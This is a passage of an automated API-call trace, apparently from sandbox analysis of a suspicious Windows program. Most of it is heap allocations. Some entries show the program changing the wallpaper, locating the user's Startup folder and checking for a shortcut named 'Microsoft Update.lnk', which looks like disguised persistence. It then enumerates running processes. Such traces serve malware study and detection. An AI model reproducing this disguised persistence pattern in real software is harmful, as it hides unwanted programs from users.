| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0289.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0289.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0289.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0289.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0289.661] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0289.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0289.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0289.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0289.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0289.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0289.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0289.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0289.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0289.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0289.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0289.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.662] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0289.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0289.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0289.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0289.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0289.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0289.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0289.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0289.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0289.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0289.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0289.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0289.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0289.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0289.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0289.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0289.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0289.785] FreeLibrary (hLibModule=0x74f40000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0289.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0289.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0289.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0289.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0289.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0289.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0289.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0289.788] TranslateMessage (lpMsg=0x8bf710) returned 0 [0289.788] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0289.788] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0289.788] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0289.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0289.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0289.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0289.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0289.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0289.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0289.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0289.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0289.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0289.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0289.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0289.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0289.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0289.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0289.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0289.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0289.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0289.792] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0289.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0289.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0289.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0289.793] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0289.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0289.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0289.794] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0289.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0289.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0289.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0289.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0289.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0289.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0289.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0289.795] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0289.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0289.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0289.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0289.796] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0289.796] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0289.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0289.799] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 